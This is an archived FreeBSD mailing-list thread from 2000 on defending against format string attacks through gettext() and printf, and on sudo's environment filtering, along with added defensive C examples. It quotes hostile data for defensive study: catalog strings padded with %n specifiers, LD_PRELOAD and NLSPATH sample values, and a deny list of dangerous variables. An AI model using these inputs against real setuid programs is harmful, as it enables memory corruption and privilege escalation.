From: Alfred Perlstein To: John Doh! Cc: security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: How to stop problems from printf Message-ID: <20000907193314.B12231@fw.wintelcom.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from johndoh_@hotmail.com on Thu, Sep 07, 2000 at 06:27:57PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * John Doh! [000907 19:28] wrote: > Hello to you am I C coder who to wish write programs we cannot exploit via > code such as below. > > > > > main(int argc, char **argv) > > { > > if(argc > 1) { > > printf(gettext("usage: %s filename\n"),argv[0]); > > exit(0); > > } > > printf("normal execution proceeds...\n"); > > } > > Issue is must be getting format string from "untrusted" place, but want to > limit substitution of %... to the substitution of say in example the > argv[0], but to not do others so that say given "usage: %s filename %p" %p > not interpret but to be print instead as literally so we get output of > (saying to be argv[0] as test just for example) usage: test filename %p > > any hints you have I am very greatful for. try "%%p" -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 19:37:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f151.pav1.hotmail.com [64.4.31.151]) by hub.freebsd.org (Postfix) with ESMTP id AC76937B42C; Thu, 7 Sep 2000 19:37:34 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 7 Sep 2000 19:37:34 -0700 Received: from 165.247.24.83 by pv1fd.pav1.hotmail.msn.com with HTTP; Fri, 08 Sep 2000 02:37:34 GMT X-Originating-IP: [165.247.24.83] 
From: "John Doh!" To: bright@wintelcom.net Cc: security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: How to stop problems from printf Date: Thu, 07 Sep 2000 18:37:34 AKDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 08 Sep 2000 02:37:34.0507 (UTC) FILETIME=[BE6FC7B0:01C0193D] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 
>From: Alfred Perlstein >To: John Doh! >CC: security@FreeBSD.ORG, hackers@FreeBSD.ORG >Subject: Re: How to stop problems from printf >Date: Thu, 7 Sep 2000 19:33:14 -0700 > >* John Doh! [000907 19:28] wrote: > > Hello to you am I C coder who to wish write programs we cannot exploit >via > > code such as below. > > > > > > > > main(int argc, char **argv) > > > { > > > if(argc > 1) { > > > printf(gettext("usage: %s filename\n"),argv[0]); > > > exit(0); > > > } > > > printf("normal execution proceeds...\n"); > > > } > > > > Issue is must be getting format string from "untrusted" place, but want >to > > limit substitution of %... to the substitution of say in example the > > argv[0], but to not do others so that say given "usage: %s filename %p" >%p > > not interpret but to be print instead as literally so we get output of > > (saying to be argv[0] as test just for example) usage: test filename %p > > > > any hints you have I am very greatful for. > >try "%%p" > >-Alfred That is what I would do if I could always control string, but point is input string is not trusted...how to either validate or else to have printf limit to its arguments. Any ideas? _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 19:59:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 070B137B423; Thu, 7 Sep 2000 19:59:40 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA40578; Thu, 7 Sep 2000 20:59:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA50393; Thu, 7 Sep 2000 20:59:18 -0600 (MDT) Message-Id: <200009080259.UAA50393@harmony.village.org> To: "John Doh!" Subject: Re: How to stop problems from printf Cc: security@FreeBSD.ORG, hackers@FreeBSD.ORG In-reply-to: Your message of "Thu, 07 Sep 2000 18:27:57 +0700." References: Date: Thu, 07 Sep 2000 20:59:18 -0600 
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message "John Doh!" writes:
: Issue is must be getting format string from "untrusted" place, but want to
: limit substitution of %... to the substitution of say in example the
: argv[0], but to not do others so that say given "usage: %s filename %p" %p
: not interpret but to be print instead as literally so we get output of
: (saying to be argv[0] as test just for example) usage: test filename %p
:
: any hints you have I am very grateful for.

Fix gettext to only allow N arguments in the same order that the
original message had.

Warner

From owner-freebsd-security Thu Sep 7 20:21:20 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9FB2437B42C; Thu, 7 Sep 2000 20:21:15 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id UAA69687; Thu, 7 Sep 2000 20:21:15 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 7 Sep 2000 20:21:15 -0700 (PDT)
From: Kris Kennaway To: Warner Losh Cc: John Doh! , security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: How to stop problems from printf In-Reply-To: <200009080259.UAA50393@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message "John Doh!" writes: > : Issue is must be getting format string from "untrusted" place, but want to > : limit substitution of %... to the substitution of say in example the > : argv[0], but to not do others so that say given "usage: %s filename %p" %p > : not interpret but to be print instead as literally so we get output of > : (saying to be argv[0] as test just for example) usage: test filename %p > : > : any hints you have I am very greatful for. > > Fix gettext to only allow N arguments in the same order that the > original message had. gettext() doesnt take any additional arguments, AFAIK it just munges the string. The argument substitution was being done by printf() in the example given. "usage: %s filename" -> "blurgle: %s flobodob" But if you're looking up in an untrusted catalog, then it could return "blurgle: %s flobodob %n%n%n%n%n" in which case your function might be insecure. The only possibilities I immediately see are: 1) Don't do that (look up in untrusted catalogs) 2) Write a vgettext(char *buf, int size, const char *fmt...) which a) looks up the message in the catalog, b) verifies the returned string has the same number and type of format strings, and c) substitutes the arguments passed to it using vsnprintf() into the passed buffer. The resulting string should then be handled using function("%s", buf) to deal with escaped format strings ("%%s" which would be parsed to %s by the vsnprintf()). I don't think you can do it securely otherwise, unless I'm missing something. 
The problem is that you want gettext to substitute arguments into the
string, but it doesn't do that, and the string it returns has an unknown
number of format strings so it's not safe to use in a varargs function.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

Message-Id: <200009080352.VAA51001@harmony.village.org>
To: Kris Kennaway
Subject: Re: How to stop problems from printf
Cc: John Doh!, security@FreeBSD.org, hackers@FreeBSD.org
In-reply-to: Your message of "Thu, 07 Sep 2000 20:21:15 PDT."
Date: Thu, 07 Sep 2000 21:52:03 -0600
From: Warner Losh

In message Kris Kennaway writes:
: gettext() doesn't take any additional arguments, AFAIK it just munges the
: string. The argument substitution was being done by printf() in the
: example given.

Right. You know how many args are expected, since you know printf.

: The only possibilities I immediately see are:
:
: 1) Don't do that (look up in untrusted catalogs)
:
: 2) Write a vgettext(char *buf, int size, const char *fmt...) which a)
: looks up the message in the catalog, b) verifies the returned string has
: the same number and type of format strings, and c) substitutes the
: arguments passed to it using vsnprintf() into the passed buffer. The
: resulting string should then be handled using function("%s", buf) to deal
: with escaped format strings ("%%s" which would be parsed to %s by the
: vsnprintf()). I don't think you can do it securely otherwise, unless I'm
: missing something.
:
: The problem is that you want gettext to substitute arguments into the
: string, but it doesn't do that, and the string it returns has an unknown
: number of format strings so it's not safe to use in a varargs function.

3) figure out how many args a string needs and forbid strings with
more than that in them. It knows from the original number of
% args, can apply the printf rules. It would be trivial to write
one function to do most of this. You get the number of args in the
key, you get the number of args in the new string using the same
routine. If the two numbers aren't equal, you return the original
key string, or abort.
Warner

Date: Thu, 7 Sep 2000 20:57:07 -0700 (PDT)
From: Kris Kennaway
To: Warner Losh
Cc: John Doh!, security@FreeBSD.org, hackers@FreeBSD.org
Subject: Re: How to stop problems from printf
In-Reply-To: <200009080352.VAA51001@harmony.village.org>

On Thu, 7 Sep 2000, Warner Losh wrote:

> In message Kris Kennaway writes:
> : gettext() doesn't take any additional arguments, AFAIK it just munges the
> : string. The argument substitution was being done by printf() in the
> : example given.
>
> Right. You know how many args are expected, since you know printf.
>
> : The only possibilities I immediately see are:
> :
> : 1) Don't do that (look up in untrusted catalogs)
> :
> : 2) Write a vgettext(char *buf, int size, const char *fmt...) which a)
> : looks up the message in the catalog, b) verifies the returned string has
> : the same number and type of format strings, and c) substitutes the
> : arguments passed to it using vsnprintf() into the passed buffer. The
> : resulting string should then be handled using function("%s", buf) to deal
> : with escaped format strings ("%%s" which would be parsed to %s by the
> : vsnprintf()). I don't think you can do it securely otherwise, unless I'm
> : missing something.
> :
> : The problem is that you want gettext to substitute arguments into the
> : string, but it doesn't do that, and the string it returns has an unknown
> : number of format strings so it's not safe to use in a varargs function.
>
> 3) figure out how many args a string needs and forbid strings with
> more than that in them. It knows from the original number of
> % args, can apply the printf rules. It would be trivial to write
> one function to do most of this. You get the number of args in the
> key, you get the number of args in the new string using the same
> routine. If the two numbers aren't equal, you return the original
> key string, or abort.
It also needs to check they are all of the same type, as changing a %d to
a %s for example could conceivably be exploitable. And you would have to
forbid escaped % characters as well. Yeah, I think that would be
doable. We probably should talk to the gnu gettext guys.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

Message-ID: <39B864D5.5BCC24E7@smartsoft.cc>
Date: Fri, 08 Sep 2000 00:02:29 -0400
From: Jan Knepper
Organization: Smartsoft, LLC
To: "John Doh!"
Cc: bright@wintelcom.net, security@FreeBSD.ORG, hackers@FreeBSD.ORG
Subject: Re: How to stop problems from printf

I don't know what you are doing with the 'gettext' in the call to 'printf'.
However for printf usage I would always limit the size of a string being
displayed with "%s", thus as "%-.80s" for instance.

I would *never* do:

    printf ( argv [ 0 ] );

Since argv [ 0 ] indeed is untrusted. However:

    printf ( "%s", argv [ 0 ] );

already is a lot safer. You should not have to worry about any content of
argv [ 0 ] other than the length if that ever would be an issue. The content
of argv [ 0 ] in this case is not being parsed as a C-format string.

However for just displaying strings I would use puts or fputs. I mean why
call a heavy duty function as printf when the job can be very easily done
with a puts/fputs.

HTH
Jan

"John Doh!" wrote:
> >From: Alfred Perlstein
> >To: John Doh!
> >CC: security@FreeBSD.ORG, hackers@FreeBSD.ORG
> >Subject: Re: How to stop problems from printf
> >Date: Thu, 7 Sep 2000 19:33:14 -0700
> >
> >* John Doh! [000907 19:28] wrote:
> > > Hello to you am I C coder who to wish write programs we cannot exploit
> > > via code such as below.
> > >
> > >
> > > > main(int argc, char **argv)
> > > > {
> > > >   if(argc > 1) {
> > > >     printf(gettext("usage: %s filename\n"),argv[0]);
> > > >     exit(0);
> > > >   }
> > > >   printf("normal execution proceeds...\n");
> > > > }
> > >
> > > Issue is must be getting format string from "untrusted" place, but want
> > > to limit substitution of %... to the substitution of say in example the
> > > argv[0], but to not do others so that say given "usage: %s filename %p"
> > > %p not interpret but to be print instead as literally so we get output of
> > > (saying to be argv[0] as test just for example) usage: test filename %p
> > >
> > > any hints you have I am very grateful for.
> >
> >try "%%p"
> >
> >-Alfred
>
> That is what I would do if I could always control string, but point is input
> string is not trusted...how to either validate or else to have printf limit
> to its arguments. Any ideas?

--
Jan Knepper
Smartsoft, LLC
88 Petersburg Road
Petersburg, NJ 08270
U.S.A.
http://www.smartsoft.cc/
http://www.mp3.com/pianoprincess
Phone : 609-628-4260
FAX   : 609-628-1267
FAX   : 303-845-6415 http://www.fax4free.com/
Phone : 020-873-3837 http://www.xoip.nl/ (Dutch)
FAX   : 020-873-3837 http://www.xoip.nl/ (Dutch)

In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

Message-Id: <200009080414.WAA51177@harmony.village.org>
To: Kris Kennaway
Subject: Re: How to stop problems from printf
Cc: John Doh!, security@FreeBSD.org, hackers@FreeBSD.org
In-reply-to: Your message of "Thu, 07 Sep 2000 20:57:07 PDT."
Date: Thu, 07 Sep 2000 22:14:28 -0600
From: Warner Losh

In message Kris Kennaway writes:
: It also needs to check they are all of the same type, as changing a %d to
: a %s for example could conceivably be exploitable. And you would have to
: forbid escaped % characters as well. Yeah, I think that would be
: doable. We probably should talk to the gnu gettext guys.

Hmmm, yes, you would have to check as well. I thought I said that
originally. No need to forbid %%, however. That's not exploitable
unless you nest these things, and then all bets are off.

Warner

Date: Thu, 7 Sep 2000 22:02:45 -0700 (PDT)
From: Kris Kennaway
To: Jan Knepper
Cc: John Doh!, bright@wintelcom.net, security@FreeBSD.ORG, hackers@FreeBSD.ORG
Subject: Re: How to stop problems from printf
In-Reply-To: <39B864D5.5BCC24E7@smartsoft.cc>

On Fri, 8 Sep 2000, Jan Knepper wrote:

> I don't know what you are doing with the 'gettext' in the call to 'printf'.

Translate the string into a localized version. You can't just
printf("%s", gettext(...), args) because the arguments won't be printed,
only the raw string returned from gettext will, which contains operators
you wanted to be substituted for. See the original example.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

To: "Todd C. Miller"
Cc: "Vladimir Mencl, MK, susSED", "Andrey A. Chernov", Warner Losh, Kris Kennaway, freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-reply-to: Your message of "Thu, 07 Sep 2000 16:15:55 MDT." <200009072215.e87MFtQ24652@xerxes.courtesan.com>
Date: Fri, 08 Sep 2000 10:54:50 +0100
From: David Pick

> Sudo already discards the following:
>     IFS
>     LOCALDOMAIN
>     RES_OPTIONS
>     HOSTALIASES
>     LD_*
>     _RLD*
>     SHLIB_PATH
>     LIBPATH
>     KRB_CONF
>     KRB5_CONFIG
>     ENV
>     BASH_ENV

A fair list of not-obviously-related environment variables. (Puts
on thinking cap and makes a correlation with packet filter rules.)
It would be *much* safer to adopt a "deny all and only allow a
list of variables that are known to be safe and wanted" approach
rather than a "block the ones we know are unsafe and miss blocking
a few we don't know about".

--
David Pick

Date: Fri, 8 Sep 2000 12:07:18 +0200 (MET DST)
From: "Vladimir Mencl, MK, susSED"
To: David Pick
Cc: "Todd C. Miller", "Andrey A. Chernov", Warner Losh, Kris Kennaway, freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)

On Fri, 8 Sep 2000, David Pick wrote:

> A fair list of not-obviously-related environment variables. (Puts
> on thinking cap and makes a correlation with packet filter rules.)
> It would be *much* safer to adopt a "deny all and only allow a
> list of variables that are known to be safe and wanted" approach
> rather than a "block the ones we know are unsafe and miss blocking
> a few we don't know about".

Yes, that is the correct approach.

Probably, sudo should maintain a system-wide list of "good"_and_wanted
variables, + there might be a per-command list of variables to pass.

However, a system facility to keep on the "issetugid" flag for child
processes would help us a lot too - the sanity checks made in the libc
should be executed too.

What about establishing a convention (if there's none till now) to set an
environment variable ISSETUGID in a program like sudo, and passing this
variable as a warning indicator to all child processes?
Vladimir Mencl
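One way a privileged wrapper can implement the "deny all, allow a known list" approach argued for in the two messages above, as an added example (not sudo's code and not code from any participant): the allowlist and the sample environment are constructed for the example, and the filtered array is what would be handed to execve().

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Allowlist for a privileged wrapper (constructed for this example; sudo's
 * real policy lives in its own configuration). Anything not named here is
 * dropped: LD_*, IFS, BASH_ENV and friends, but also the locale and catalog
 * variables (LANG, LC_*, NLSPATH) through which catopen() and setlocale()
 * are steered at a message catalog, which is how a hostile format string
 * reaches a setuid program in the first place.
 */
static const char *const env_allowlist[] = { "PATH", "HOME", "USER", "TERM", "TZ", NULL };

/* Return 1 if the NAME part of "NAME=value" (the first len bytes) is allowlisted. */
static int env_allowed(const char *name, size_t len)
{
    for (const char *const *a = env_allowlist; *a != NULL; a++)
        if (strlen(*a) == len && strncmp(*a, name, len) == 0)
            return 1;
    return 0;
}

/*
 * Build a new environment from src (a NULL-terminated "NAME=value" array)
 * containing only allowlisted variables; entries without '=' are dropped.
 * Returns a malloc'd NULL-terminated array whose strings alias src, ready
 * for execve(); the caller frees the array. Returns NULL on allocation failure.
 */
char **filter_env(char *const *src)
{
    size_t n = 0, kept = 0;
    while (src[n] != NULL)
        n++;
    char **dst = malloc((n + 1) * sizeof *dst);
    if (dst == NULL)
        return NULL;
    for (size_t i = 0; i < n; i++) {
        const char *eq = strchr(src[i], '=');
        if (eq != NULL && env_allowed(src[i], (size_t)(eq - src[i])))
            dst[kept++] = src[i];
    }
    dst[kept] = NULL;
    return dst;
}

/* Number of entries in a NULL-terminated environment array. */
size_t env_count(char *const *env)
{
    size_t n = 0;
    while (env[n] != NULL)
        n++;
    return n;
}

/* Constructed environment, as a setuid wrapper might receive it from a caller. */
static char *const sample_env[] = {
    "PATH=/usr/bin:/bin",
    "HOME=/home/alice",
    "LD_PRELOAD=/tmp/evil.so",
    "NLSPATH=/tmp/%N.cat",
    "LC_MESSAGES=evil",
    "BASH_ENV=/tmp/rc",
    "TERM=xterm",
    "NOEQUALS",
    NULL,
};

int main(void)
{
    char **clean = filter_env(sample_env);
    if (clean == NULL)
        return 1;
    for (size_t i = 0; clean[i] != NULL; i++)
        printf("%s\n", clean[i]);     /* only PATH, HOME and TERM survive */
    /* a real wrapper would now call execve(path, argv, clean) */
    free(clean);
    return 0;
}
```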
From: Sheldon Hearn
To: "Vladimir Mencl, MK, susSED"
Cc: David Pick, freebsd-security@freebsd.org, security-officer@freebsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-reply-to: Your message of "Fri, 08 Sep 2000 12:07:18 +0200."
Date: Fri, 08 Sep 2000 12:20:25 +0200
Message-ID: <15241.968408425@axl.fw.uunet.co.za>

On Fri, 08 Sep 2000 12:07:18 +0200, "Vladimir Mencl, MK, susSED" wrote:

> > It would be *much* safer to adopt a "deny all and only allow a
> > list of variables that are known to be safe and wanted" approach
> > rather than a "block the ones we know are unsafe and miss blocking
> > a few we don't know about".
>
> Yes, that is the correct approach.

So which one of you gentlemen is going to take this up with the sudo
developer, Todd Miller ?

Or are you both just talking for the sake of being heard? :-)

Ciao,
Sheldon.

Date: Fri, 8 Sep 2000 03:27:55 -0700 (PDT)
From: Kris Kennaway
To: Sheldon Hearn
Cc: "Vladimir Mencl, MK, susSED", David Pick, freebsd-security@freebsd.org, security-officer@freebsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <15241.968408425@axl.fw.uunet.co.za>

On Fri, 8 Sep 2000, Sheldon Hearn wrote:

> > > It would be *much* safer to adopt a "deny all and only allow a
> > > list of variables that are known to be safe and wanted" approach
> > > rather than a "block the ones we know are unsafe and miss blocking
> > > a few we don't know about".
> >
> > Yes, that is the correct approach.
>
> So which one of you gentlemen is going to take this up with the sudo
> developer, Todd Miller ?
>
> Or are you both just talking for the sake of being heard? :-)

Erm, he already participated in other parts of the thread, and agreed when
I made this suggestion earlier today.

*thwack* :-)

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

Date: Fri, 8 Sep 2000 14:47:07 +0200
From: Gabor Zahemszky
To: freebsd-security@freebsd.org
Cc: kris@freebsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
Message-ID: <20000908144707.F682@zg.CoDe.hu>
In-Reply-To: from kris@FreeBSD.ORG on Thu, Sep 07, 2000 at 02:53:51AM -0700

On Thu, Sep 07, 2000 at 02:53:51AM -0700, Kris Kennaway wrote:
> HOWEVER: no program shipped in the FreeBSD base system is believed to be
> vulnerable to either of these problems.
>
> They both affect catopen(), and we don't use that function at all except
> in tcsh, which is non-privileged. We don't even have any code which has

Oops! On my 3.4R system, there is a little utility, named: ee (and ree),
and it is using catopen(). I don't think it changed in 4.x, is it?

ZGabor at CoDe dot HU

--
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"

Date: Fri, 8 Sep 2000 12:57:08 -0400
To: "John Doh!", security@FreeBSD.ORG, hackers@FreeBSD.ORG
From: Garance A Drosihn
Subject: Re: How to stop problems from printf

At 6:27 PM -0400 9/7/00, John Doh! wrote:
>Hello to you am I C coder who to wish write programs we cannot
>exploit via code such as below.
>
>> main(int argc, char **argv)
>> {
>>   if(argc > 1) {
>>     printf(gettext("usage: %s filename\n"),argv[0]);
>>     exit(0);
>>   }
>>   printf("normal execution proceeds...\n");
>> }
>
>Issue is must be getting format string from "untrusted" place, but want
>to limit substitution of %... to the substitution of say in example the
>argv[0], but to not do others so that say given "usage: %s filename %p"
>%p not interpret but to be print instead as literally so we get output
>of (saying to be argv[0] as test just for example)
>usage: test filename %p

Since gettext is getting a string from an untrusted place, you should
treat it as you would treat a string being typed in from a user. For
the example you give, you know that you are expecting ONE %s argument,
and that ONE %s is the only substitution you will allow. So, have
gettext return its value into some string. Then, YOU search that
string for '%s'. Then you do a printf of:

    printf("%s%s%s", textBefore%s, argv[0], textAfter%s);

For the given example, this is pretty trivial. If you have several
different values you will substitute in the string returned by gettext,
then it gets a bit more cumbersome. My suggestion is a fine solution
for your example (IMO :-), but if you did have more substitutions then
I might try some alternate strategy.

One has to be careful about buffer overflows in that temp string, of
course.
---
Garance Alistair Drosehn     =   gad@eclipse.acs.rpi.edu
Senior Systems Programmer           or  drosih@rpi.edu
Rensselaer Polytechnic Institute
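The check proposed by Kris Kennaway and Warner Losh earlier in this thread (same number, order and type of conversion specifiers, otherwise fall back to the compiled-in string, with "%%" passed through as Warner notes) and Garance's "treat the catalog string as user input" advice, carried out in C as an added example; this is not code from any participant, the catalog entries in main() are constructed stand-ins for what gettext() might return, and the signature goes beyond the page's examples by also comparing length modifiers (so "%ld" does not pass for "%d") and counting '*' widths as arguments.

```c
#include <stdio.h>
#include <string.h>

#define SIG_MAX 32   /* argument slots tracked per format string */

/*
 * Build the argument signature of a printf-style format string: one entry
 * per argument consumed, each the length modifier plus conversion character
 * ("d", "s", "ld", "hhx"...). A '*' width or precision consumes an int and
 * is recorded as "d"; "%%" consumes nothing. Returns the entry count, or -1
 * if the string contains %n, %p, an unknown conversion or a cut-off
 * specifier, all of which are rejected outright.
 */
static int fmt_signature(const char *fmt, char sig[][4], int max)
{
    int n = 0;
    const char *p = fmt;

    while (*p != '\0') {
        if (*p++ != '%')
            continue;
        if (*p == '%') {                      /* "%%": literal percent */
            p++;
            continue;
        }
        while (*p != '\0' && strchr("#+ 0-", *p) != NULL)   /* flags */
            p++;
        if (*p == '*') {                      /* width from an argument */
            if (n == max) return -1;
            strcpy(sig[n++], "d");
            p++;
        } else {
            while (*p >= '0' && *p <= '9') p++;
        }
        if (*p == '.') {                      /* precision */
            p++;
            if (*p == '*') {
                if (n == max) return -1;
                strcpy(sig[n++], "d");
                p++;
            } else {
                while (*p >= '0' && *p <= '9') p++;
            }
        }
        char entry[4] = { 0 };
        int k = 0;
        if (*p != '\0' && strchr("hlLqjzt", *p) != NULL) {   /* length modifier */
            entry[k++] = *p;
            if ((*p == 'h' || *p == 'l') && p[1] == *p)       /* hh, ll */
                entry[k++] = *++p;
            p++;
        }
        if (*p == '\0' || strchr("diouxXfeEgGcs", *p) == NULL)
            return -1;
        entry[k] = *p++;
        if (n == max) return -1;
        strcpy(sig[n++], entry);
    }
    return n;
}

/*
 * Return pref (the catalog string) only if it consumes exactly the same
 * argument types, in the same order, as orig (the compiled-in string) and
 * is no longer than maxlen (0 = unlimited); otherwise return orig.
 */
const char *safe_fmtstr(const char *orig, const char *pref, size_t maxlen)
{
    char so[SIG_MAX][4], sp[SIG_MAX][4];
    int no = fmt_signature(orig, so, SIG_MAX);
    int np = fmt_signature(pref, sp, SIG_MAX);

    if (no < 0 || np < 0 || no != np)
        return orig;
    if (maxlen != 0 && strlen(pref) > maxlen)
        return orig;
    for (int i = 0; i < no; i++)
        if (strcmp(so[i], sp[i]) != 0)
            return orig;
    return pref;
}

int main(int argc, char **argv)
{
    /* Constructed (key, catalog string) pairs standing in for gettext(). */
    const char *cat[][2] = {
        { "usage: %s filename\n", "Gebruik: %s bestand\n" },   /* honest */
        { "%d files in %s\n",     "%s files in %d\n" },        /* types swapped */
        { "error %d\n",           "error %d %n%n%n%n\n" },     /* hostile */
    };
    printf(safe_fmtstr(cat[0][0], cat[0][1], 0), argc > 0 ? argv[0] : "test");
    printf(safe_fmtstr(cat[1][0], cat[1][1], 0), 3, "/tmp");   /* falls back */
    printf(safe_fmtstr(cat[2][0], cat[2][1], 0), 42);          /* falls back */
    return 0;
}
```

As Aaron Gifford's note below also points out, a scanner like this is only as good as its agreement with the real printf(3) parser, so it should reject anything it does not recognise rather than guess.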
From: "Aaron D. Gifford"
Subject: Re: How to stop problems from printf
Message-Id: <20000908165753.80E7E37B42C@hub.freebsd.org>
Date: Fri, 8 Sep 2000 09:57:53 -0700 (PDT)

Okay, after the "How to stop problems from printf" discussion on
freebsd-security, in particular the example using gettext(), I thought
I'd see if there wasn't something simple that might work. The below code
is a result. Here's an example use:

#include <stdio.h>
#include <stdlib.h>
#include <libintl.h>

int main(int argc, char **argv)
{
	if(argc > 1) {
		printf(safe_fmtstr("usage: %s filename",
		                   gettext("usage: %s filename"), 0), argv[0]);
		exit(0);
	}
	printf("normal execution proceeds...");
	return 0;
}

I haven't done much testing yet. There are no guarantees. There's more
commentary/documentation in the code below.

Aaron out.

/*
 * File:        safe_fmtstr.c
 * Version:     0.9 alpha 1
 *
 * Written by Aaron D. Gifford
 *
 * Copyright (c) 2000 Aaron D. Gifford.  All rights reserved.
 *
 *
 * You may redistribute and use in source or binary form, with or
 * without modification provided that credit to the author(s)
 * remains intact and that the appropriate copyright, license,
 * and/or disclaimers remain intact.
 *
 * THIS SOFTWARE IS PROVIDED BY AARON D. GIFFORD ``AS IS'' AND ANY
 * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
 * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL AARON D. GIFFORD OR
 * OTHER CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
 * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 * OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 *
 * BUG FIXES, COMMENTS, and SUGGESTIONS are always WELCOME!
 *
 * Please send bug fixes, suggestions, or comments to:
 *
 *     Aaron D. Gifford
 *     < m e AT a a r o n g i f f o r d DOT c o m >
 *
 * This file should always be available from the web page
 * at http://www.aarongifford.com/computers/ or on one of
 * the pages linked thereon.
 *
 *
 *
 * WHAT IS IT?  This file implements a method of determining if
 * two different strings intended for use as format strings with the
 * printf() family of functions are identical or different with regard
 * to the format specifiers contained therein.  This is accomplished by
 * "compressing" the format specifier strings to just those characters
 * that are complete format specifiers or incomplete format specifiers.
 * The compressed versions of two format strings can thus be compared to
 * see if they are the same.
 *
 * I wrote it just to see if it is possible to make things like the below
 * snippet safer:
 *
 *     printf(gettext("Some string %s with %d formatting items."), ...);
 *
 * Using this code, you would instead do something like:
 *
 *     printf(safe_fmtstr("A format %s string %d",
 *                        gettext("A format %s string %d"),
 *                        MAX_FMT_LEN), ...);
 *
 * This code analyzes both passed format strings to make sure that they
 * match in format specifiers.  If they match and if the second passed
 * format string does not exceed the maximum length, it is considered "safe"
 * and will be returned by the safe_fmtstr() function.
 *
 * The function that does the two-pass format string compression or analysis
 * is compress_fmtstr().  This function removes all non-format specifier
 * characters to create a compressed representation of the format string.
 * Two such compressed strings may then be compared to see if the format
 * specifiers match.
 *
 * The other function herein, scan_fmtstr(), is meant for internal use by the
 * compress_fmtstr() function.  It implements a finite state parser that does
 * the analysis of the format string.
 *
 * This code makes several assumptions that may be completely wrong or even
 * dangerous.  Please let me know where I'm wrong and/or where I may be doing
 * something foolish or insecure.  I wrote this code one night just for fun
 * to see how hard it would be.  I based my assumptions on the FreeBSD 4.1
 * PRINTF(1) man page.
 *
 * I don't know how safe this is.  It is mostly untested.  Likewise, I don't
 * know how portable it is.  Finally, no amount of analysis of a string can
 * truly guarantee that it is safe, because the analysis code is not the same
 * as the code that actually uses the analyzed parameters (in this case, the
 * printf() family of functions).  Because this code does not share the exact
 * same parsing code with the printf() functions, slight differences may occur
 * that result in insecurity.
 *
